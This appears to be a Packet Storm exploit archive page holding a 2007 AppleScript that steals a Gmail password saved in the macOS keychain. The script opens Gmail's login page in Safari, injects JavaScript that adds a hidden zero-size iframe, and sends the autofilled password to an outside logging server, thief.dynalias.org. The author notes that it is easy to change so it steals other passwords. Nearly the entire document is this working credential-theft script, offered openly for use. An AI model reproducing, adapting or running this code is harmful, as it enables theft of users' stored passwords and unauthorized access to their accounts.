This script can be used to steal G-Mail's keychained password by injecting javascript into Safari. When executed it opens G-Mail's login page, reads the saved password and sends it to a logging server by creating an hidden iframe into G-Mail's page.
20de0e897ec70cae2d19020dbc28f0afb395ff11a21cf566e2d898f6373105e1-- This script can be used to steal gmail's keychained password by injecting
-- Javascripts into Safari. When executed it opens gmail's login page, reads
-- saved password and sends it to a logging server by creating an hidden iframe
-- into gmail's page. It can be easly modified to steal other pass.
-- poplix papuasia.org -- http://px.dynalias.org -- 09-22-2007
--Your logging server
set LOGGING_URL to "http://thief.dynalias.org/log.php?p="
--Creates an hidden iframe into google's login DIV
set HIDDENFRAME to "document.getElementById('login').innerHTML+='<iframe id=steal width=0 height=0></iframe>'"
--Stealing code
set JSTEAL to "document.getElementById('steal').src='" & LOGGING_URL & "'+document.getElementById('gaia_loginform').Passwd.value"
--Open gmail login page
tell application "Safari"
open location "https://www.google.com/accounts/ServiceLogin?service=mail"
end tell
--Wait loading...
delay 10
--Create an hidden iframe to load LOGGING_URL
tell application "Safari"
do JavaScript HIDDENFRAME in document 1
end tell
delay 1
--Send password to LOGGING_URL
tell application "Safari"
do JavaScript JSTEAL in document 1
end tell
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed